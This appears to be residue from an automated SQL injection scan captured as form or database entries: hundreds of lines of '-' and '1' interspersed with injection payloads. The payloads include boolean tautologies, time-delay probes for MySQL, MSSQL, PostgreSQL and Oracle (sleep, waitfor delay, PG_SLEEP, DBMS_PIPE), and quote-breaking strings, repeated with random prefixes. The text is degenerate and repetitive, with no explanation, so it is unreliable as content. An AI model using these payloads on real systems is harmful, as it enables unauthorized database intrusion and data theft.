-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
CRItmmzy
-
1
-
-1 OR 2+302-302-1=0+0+0+1 --
-
-1 OR 2+496-496-1=0+0+0+1
-
-1' OR 2+137-137-1=0+0+0+1 --
-
-1' OR 2+685-685-1=0+0+0+1 or '9LvFQSxA'='
-
-1" OR 2+676-676-1=0+0+0+1 --
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
if(now()=sysdate(),sleep(15),0)
-
1
-
1
-
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
-
1
-
1
-
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
-
1
-
1
-
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
-
1
-
1
-
-1; waitfor delay '0:0:15' --
-
1
-
1
-
1
-
1
-
-1); waitfor delay '0:0:15' --
-
1
-
1
-
-1)); waitfor delay '0:0:15' --
-
1
-
1
-
1 waitfor delay '0:0:15' --
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
yQBSOZPb'; waitfor delay '0:0:15' --
-
1
-
1
-
lnHLadIE'); waitfor delay '0:0:15' --
-
1
-
1
-
kY8GAs2R')); waitfor delay '0:0:15' --
-
1
-
1
-
-5 OR 603=(SELECT 603 FROM PG_SLEEP(15))--
-
1
-
1
-
-5) OR 626=(SELECT 626 FROM PG_SLEEP(15))--
-
1
-
1
-
-1)) OR 12=(SELECT 12 FROM PG_SLEEP(15))--
-
1
-
1
-
wsBXBNAo' OR 959=(SELECT 959 FROM PG_SLEEP(15))--
-
1
-
1
-
XRZse4Af') OR 448=(SELECT 448 FROM PG_SLEEP(15))--
-
1
-
1
-
8wBNqeMw')) OR 579=(SELECT 579 FROM PG_SLEEP(15))--
-
1
-
1
-
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
-
1
-
1
-
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
-
1'"
-
1 ????%2527%2522
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
ljEmNTd9
-
-1 OR 2+711-711-1=0+0+0+1 --
-
-1' OR 2+943-943-1=0+0+0+1 --
-
1
-
-1' OR 2+702-702-1=0+0+0+1 or 'i723IEHx'='
-
-1" OR 2+755-755-1=0+0+0+1 --
-
1
-
1
-
if(now()=sysdate(),sleep(15),0)
-
1
-
IO1gQNvR
-
-1 OR 2+634-634-1=0+0+0+1 --
-
-1 OR 2+923-923-1=0+0+0+1
-
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
-
-1' OR 2+351-351-1=0+0+0+1 --
-
-1' OR 2+642-642-1=0+0+0+1 or 'nO3YTlaf'='
-
-1" OR 2+36-36-1=0+0+0+1 --
-
1
-
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
-
if(now()=sysdate(),sleep(15),0)
-
1
-
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
-
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
-
1
-
-1; waitfor delay '0:0:15' --
-
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
-
1
-
-1); waitfor delay '0:0:15' --
-
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
-
1
-
-1)); waitfor delay '0:0:15' --
-
-1; waitfor delay '0:0:15' --
-
1
-
1 waitfor delay '0:0:15' --
-
-1); waitfor delay '0:0:15' --
-
1
-
9nCdwkmZ'; waitfor delay '0:0:15' --
-
-1)); waitfor delay '0:0:15' --
-
1
-
1
-
1
-
F2bB9wmj'); waitfor delay '0:0:15' --
-
1 waitfor delay '0:0:15' --
-
1
-
nXAMien0')); waitfor delay '0:0:15' --
-
UFbNkj3S'; waitfor delay '0:0:15' --
-
1
-
-5 OR 415=(SELECT 415 FROM PG_SLEEP(15))--
-
czDrl2R0'); waitfor delay '0:0:15' --
-
-5) OR 588=(SELECT 588 FROM PG_SLEEP(15))--
-
3Wfx5E47')); waitfor delay '0:0:15' --
-
-1)) OR 654=(SELECT 654 FROM PG_SLEEP(15))--
-
-5 OR 319=(SELECT 319 FROM PG_SLEEP(15))--
-
wi426g01' OR 610=(SELECT 610 FROM PG_SLEEP(15))--
-
-5) OR 282=(SELECT 282 FROM PG_SLEEP(15))--
-
5nGCyvbL') OR 802=(SELECT 802 FROM PG_SLEEP(15))--
-
-1)) OR 581=(SELECT 581 FROM PG_SLEEP(15))--
-
WHfmBIQD')) OR 494=(SELECT 494 FROM PG_SLEEP(15))--
-
4pdq1aAN' OR 928=(SELECT 928 FROM PG_SLEEP(15))--
-
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
-
e5JMIL5i') OR 984=(SELECT 984 FROM PG_SLEEP(15))--
-
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
-
1'"
-
1 ????%2527%2522
-
DBvhS1WW')) OR 531=(SELECT 531 FROM PG_SLEEP(15))--
-
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
-
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
-
1'"
-
1 ????%2527%2522
-
1
-
1
-
1